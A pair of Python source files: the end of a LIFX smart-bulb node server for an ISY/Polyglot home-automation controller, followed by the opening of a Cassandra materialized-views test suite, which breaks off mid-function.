except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb WiFi signal strength. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV0', round(wifi_signal, 1))
self.connected = connected
self.setDriver('GV5', self.connected)
self.lastupdate = time.time()
def _nanosec_to_hours(self, ns):
return int(round(ns/(1000000000.0*60*60)))
def _bri_to_percent(self, bri):
return float(round(bri*100/65535, 4))
def setOn(self, command):
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val)*65535/255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
self.color[2] = new_bri
try:
self.device.set_color(self.color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV3', self.color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOff(self, command):
try:
self.device.set_power(False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = False
self.setDriver('ST', 0)
def dim(self, command):
if self.power is False:
LOGGER.info('{} is off, ignoring DIM'.format(self.name))
new_bri = self.color[2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def brighten(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
return
new_bri = self.color[2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def fade_up(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
if self.color[2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
self.color[2] = BR_MAX
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_down(self, command):
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_stop(self, command):
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = list(self.device.get_color())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
if self.color[2] == BR_MIN or self.color[2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
self.device.set_color(self.color, 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def setColor(self, command):
if self.connected:
_color = int(command.get('value'))
try:
self.device.set_color(COLORS[_color][1], duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
LOGGER.info('Received SetColor command from ISY. Changing color to: {}'.format(COLORS[_color][0]))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
else:
LOGGER.error('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
if _cmd == 'SETH':
self.color[0] = _val
driver = ['GV1', self.color[0]]
elif _cmd == 'SETS':
self.color[1] = _val
driver = ['GV2', self.color[1]]
elif _cmd == 'SETB':
self.color[2] = _val
driver = ['GV3', self.color[2]]
elif _cmd == 'CLITEMP':
self.color[3] = _val
driver = ['CLITEMP', self.color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
try:
self.device.set_color(self.color, self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb {}. This happens from time to time, normally safe to ignore. {}'.format(self.name, _cmd, str(ex)))
LOGGER.info('Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
if driver:
self.setDriver(driver[0], driver[1])
else: LOGGER.info('Received manual change, however the bulb is in a disconnected state... ignoring')
def setHSBKD(self, command):
query = command.get('query')
try:
self.color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
self.duration = int(query.get('D.uom42'))
LOGGER.info('Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
except TypeError:
self.duration = 0
try:
self.device.set_color(self.color, duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
self.setDriver('RR', self.duration)
def set_ir_brightness(self, command):
_val = int(command.get('value'))
if not self.device.supports_infrared():
LOGGER.error('{} is not IR capable'.format(self.name))
return
try:
self.device.set_infrared(_val)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb IR Brightness. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV7', _val)
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
if self.power is False:
LOGGER.error('{} can not run Waveform as it is currently off'.format(self.name))
return
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color, wf_period, wf_cycles, wf_duty_cycle, WAVEFORM[wf_form], wf_transient))
try:
self.device.set_waveform(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb Waveform. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxcolor'
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual,
'RR': setManual, 'SET_HSBKD': setHSBKD,
'BRT': brighten, 'DIM': dim, 'FDUP': fade_up,
'FDDOWN': fade_down, 'FDSTOP': fade_stop,
'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness, 'WAVEFORM': set_wf
}
class MultiZone(Light):
def __init__(self, controller, primary, address, name, dev, label):
super().__init__(controller, primary, address, name, dev, label)
self.num_zones = 0
self.current_zone = 0
self.new_color = None
self.pending = False
def update(self):
connected = 0
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if not self.pending:
try:
self.color = self.device.get_color_zones()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.num_zones = len(self.color)
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
try:
self.setDriver(driver, self.color[zone][ind])
except (TypeError) as e:
LOGGER.debug('setDriver for color caught an error. color was : {}'.format(self.color or None))
self.setDriver('GV4', self.current_zone)
try:
self.power = True if self.device.get_power() == 65535 else False
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self._set_st()
self.connected = connected
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def _set_st(self):
if self.num_zones == 0: return
if self.power:
avg_brightness = 0
for z in self.color:
avg_brightness += z[2]
avg_brightness /= self.num_zones
self.setDriver('ST', self._bri_to_percent(avg_brightness))
else:
self.setDriver('ST', 0)
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except:
self.duration = 0
try:
self.current_zone = int(self.getDriver('GV4'))
except:
self.current_zone = 0
self.update()
self.long_update()
def setOn(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val)*65535/255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, trans, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV3', new_color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
def dim(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.info('{} is off, ignoring DIM'.format(self.name))
new_bri = self.color[zone][2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def brighten(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
return
new_bri = self.color[zone][2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def fade_up(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
if self.color[zone][2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
new_color[2] = BR_MAX
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_down(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[zone][2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_stop(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = self.device.get_color_zones()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[zone][ind])
if self.color[zone][2] == BR_MIN or self.color[zone][2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
if self.current_zone == 0:
self.device.set_color(self.color[zone], 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.color[zone], 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def apply(self, command):
try:
if self.new_color:
self.color = deepcopy(self.new_color)
self.new_color = None
self.device.set_zone_colors(self.color, self.duration, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
LOGGER.info('Received apply command for {}'.format(self.address))
self.pending = False
def setColor(self, command):
if self.connected:
try:
_color = int(command.get('value'))
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.current_zone == 0:
self.device.set_color(COLORS[_color][1], self.duration, True)
else:
self.device.set_zone_color(zone, zone, COLORS[_color][1], self.duration, True)
LOGGER.info('Received SetColor command from ISY. Changing {} color to: {}'.format(self.address, COLORS[_color][0]))
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('mz setcolor error {}'.format(str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
else: LOGGER.info('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
try:
if _cmd == 'SETZ':
self.current_zone = int(_val)
if self.current_zone > self.num_zones: self.current_zone = 0
driver = ['GV4', self.current_zone]
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if _cmd == 'SETH':
new_color[0] = int(_val)
driver = ['GV1', new_color[0]]
elif _cmd == 'SETS':
new_color[1] = int(_val)
driver = ['GV2', new_color[1]]
elif _cmd == 'SETB':
new_color[2] = int(_val)
driver = ['GV3', new_color[2]]
elif _cmd == 'CLITEMP':
new_color[3] = int(_val)
driver = ['CLITEMP', new_color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
self.color[zone] = new_color
if self.current_zone == 0:
self.device.set_color(new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, self.duration, rapid=False)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('setmanual mz error {}'.format(ex))
LOGGER.info('Received manual change, updating the mz bulb zone {} to: {} duration: {}'.format(zone, new_color, self.duration))
if driver:
self.setDriver(driver[0], driver[1])
else: LOGGER.info('Received manual change, however the mz bulb is in a disconnected state... ignoring')
def setHSBKDZ(self, command):
query = command.get('query')
if not self.pending:
self.new_color = deepcopy(self.color)
self.pending = True
current_zone = int(query.get('Z.uom56'))
zone = deepcopy(current_zone)
if current_zone != 0: zone -= 1
self.new_color[zone] = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
try:
self.duration = int(query.get('D.uom42'))
except TypeError:
self.duration = 0
try:
if current_zone == 0:
self.device.set_color(self.new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.new_color, self.duration, rapid=False, apply = 0)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('set mz hsbkdz error %s', str(ex))
commands = {
'DON': setOn, 'DOF': Light.setOff,
'APPLY': apply, 'QUERY': Light.query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual, 'RR': setManual,
'SETZ': setManual, 'SET_HSBKDZ': setHSBKDZ,
'BRT': brighten, 'DIM': dim,
'FDUP': fade_up, 'FDDOWN': fade_down,
'FDSTOP': fade_stop, 'DFON': setOn,
'DFOF': Light.setOff, 'SETIR': Light.set_ir_brightness,
'WAVEFORM': Light.set_wf
}
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV4', 'value': 0, 'uom': 56},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxmultizone'
class Group(polyinterface.Node):
"""
LiFX Group Node Class
"""
def __init__(self, controller, primary, address, gid, label, gupdatedat):
self.label = label.replace("'", "")
super().__init__(controller, primary, address, 'LIFX Group ' + str(label))
self.lifxLabel = label
self.lifxGroup = self.controller.lifxLan.get_devices_by_group(label)
self.numMembers = len(self.lifxGroup.devices)
def start(self):
self.update()
#self.reportDrivers()
def update(self):
self.numMembers = len(self.lifxGroup.devices)
self.setDriver('ST', self.numMembers)
def long_update(self):
pass
def query(self, command = None):
self.update()
self.reportDrivers()
def setOn(self, command):
try:
self.lifxGroup.set_power(True, rapid = False)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group seton error caught %s', str(ex))
else:
LOGGER.info('Received SetOn command for group {} from ISY. Setting all {} members to ON.'.format(self.label, self.numMembers))
def setOff(self, command):
try:
self.lifxGroup.set_power(False, rapid = False)
except (lifxlan.WorkflowException, IOError) as e:
LOGGER.error('group setoff error caught {}'.format(str(e)))
else:
LOGGER.info('Received SetOff command for group {} from ISY. Setting all {} members to OFF.'.format(self.label, self.numMembers))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxGroup.set_color(COLORS[_color][1], 0, rapid = False)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolor error caught %s', str(ex))
else:
LOGGER.info('Received SetColor command for group {} from ISY. Changing color to: {} for all {} members.'.format(self.name, COLORS[_color][0], self.numMembers))
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
except TypeError:
duration = 0
try:
self.lifxGroup.set_color(color, duration = duration, rapid = False)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethsbkd error caught {}'.format(str(ex)))
else:
LOGGER.info('Recieved SetHSBKD command for group {} from ISY, Setting all members to Color {}, duration {}'.format(self.label, color, duration))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 56}]
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD
}
id = 'lifxgroup'
if __name__ == "__main__":
try:
polyglot = polyinterface.Interface('LiFX')
polyglot.start()
control = Controller(polyglot)
control.runForever()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
|
materialized_views_test.py
|
import collections
import re
import sys
import time
import traceback
import pytest
import threading
import logging
from flaky import flaky
from enum import Enum
from queue import Empty
from functools import partial
from multiprocessing import Process, Queue
from cassandra import ConsistencyLevel, InvalidRequest, WriteFailure
from cassandra.cluster import NoHostAvailable
from cassandra.concurrent import execute_concurrent_with_args
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from distutils.version import LooseVersion
from dtest import Tester, get_ip_from_node, create_ks
from tools.assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from tools.data import rows_to_list
from tools.misc import new_node
from tools.jmxutils import (JolokiaAgent, make_mbean)
since = pytest.mark.since
logger = logging.getLogger(__name__)
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@flaky
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def _rows_to_list(self, rows):
new_list = [list(row) for row in rows]
return new_list
def prepare(self, user_table=False, rf=1, options=None, nodes=3, install_byteman=False, **kwargs):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate([nodes, 0], install_byteman=install_byteman)
if options:
cluster.set_configuration_options(values=options)
cluster.start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, **kwargs)
create_ks(session, 'ks', rf)
if user_table:
session.execute(
("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username));")
)
# create a materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)"))
return session
def update_view(self, session, query, flush, compact=False):
session.execute(query)
self._replay_batchlogs()
if flush:
self.cluster.flush()
if compact:
self.cluster.compact()
def _settle_nodes(self):
logger.debug("Settling all nodes")
stage_match = re.compile(r"(?P<name>\S+)\s+(?P<active>\d+)\s+(?P<pending>\d+)\s+(?P<completed>\d+)\s+(?P<blocked>\d+)\s+(?P<alltimeblocked>\d+)")
def _settled_stages(node):
(stdout, stderr, rc) = node.nodetool("tpstats")
lines = re.split("\n+", stdout)
for line in lines:
match = stage_match.match(line)
if match is not None:
active = int(match.group('active'))
pending = int(match.group('pending'))
if active != 0 or pending != 0:
logger.debug("%s - pool %s still has %d active and %d pending" % (node.name, match.group("name"), active, pending))
return False
return True
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and not _settled_stages(node):
time.sleep(0.1)
attempts -= 1
def _build_progress_table(self):
if self.cluster.version() >= '4':
return 'system.view_builds_in_progress'
else:
return 'system.views_builds_in_progress'
def _wait_for_view(self, ks, view):
logger.debug("waiting for view")
def _view_build_finished(node):
s = self.patient_exclusive_cql_connection(node)
query = "SELECT * FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(s.execute(query))
return len(result) == 0
for node in self.cluster.nodelist():
if node.is_running():
attempts = 50 # 1 sec per attempt, so 50 seconds total
while attempts > 0 and not _view_build_finished(node):
time.sleep(1)
attempts -= 1
if attempts <= 0:
raise RuntimeError("View {}.{} build not finished after 50 seconds.".format(ks, view))
def _wait_for_view_build_start(self, session, ks, view, wait_minutes=2):
"""Wait for the start of a MV build, ensuring that it has saved some progress"""
start = time.time()
while True:
try:
query = "SELECT COUNT(*) FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(session.execute(query))
assert 0 == result[0].count
except AssertionError:
break
elapsed = (time.time() - start) / 60
if elapsed > wait_minutes:
pytest.fail("The MV build hasn't started in 2 minutes.")
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
self._settle_nodes()
def _replay_batchlogs(self):
for node in self.cluster.nodelist():
if node.is_running():
logger.debug("Replaying batchlog on node {}".format(node.name))
node.nodetool("replaybatchlog")
# CASSANDRA-13069 - Ensure replayed mutations are removed from the batchlog
node_session = self.patient_exclusive_cql_connection(node)
result = list(node_session.execute("SELECT count(*) FROM system.batches;"))
assert result[0].count == 0
def _assert_view_meta(self, session, views, exists=True, nodes=2):
if exists:
assert_one(session, "SELECT COUNT(*) FROM system.built_views", [views])
if self.cluster.version() >= '3.11':
assert_one(session, "SELECT COUNT(*) FROM system_distributed.view_build_status", [views * nodes])
else:
assert_none(session, "SELECT * FROM system.built_views")
if self.cluster.version() >= '3.11':
assert_none(session, "SELECT * FROM system_distributed.view_build_status")
assert_none(session, "SELECT * FROM {}".format(self._build_progress_table()))
def test_view_metadata_cleanup(self):
"""
drop keyspace or view should clear built_views and view_build_status
"""
session = self.prepare(rf=2, nodes=2)
def populate_data(session, rows):
logger.debug("populate base data")
for v in range(rows):
session.execute("INSERT INTO t(k,c,a,b,e,f) VALUES({v},{v},{v},{v},{v},{v})".format(v=v))
def verify_data(session, rows, views):
logger.debug("verify view data")
for v in range(rows):
for view in range(views):
assert_one(session, "SELECT * FROM mv{} WHERE k={v} AND c={v}".format(view, v=v), [v, v, v, v, v, v])
def create_keyspace(session, ks="ks1", rf=2):
create_ks(session, ks, rf)
def create_table(session):
logger.debug("create base table")
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
def create_views(session, views, keyspace="ks1"):
logger.debug("create view")
for view in range(views):
session.execute("CREATE MATERIALIZED VIEW mv{} AS SELECT * FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c,k)".format(view),
timeout=60)
self._wait_for_view(keyspace, "mv{}".format(view))
def drop_keyspace(session, keyspace="ks1"):
logger.debug("drop keyspace {}".format(keyspace))
session.execute("DROP KEYSPACE IF EXISTS {}".format(keyspace),
timeout=60)
def drop_views(session, views):
logger.debug("drop all views")
for view in range(views):
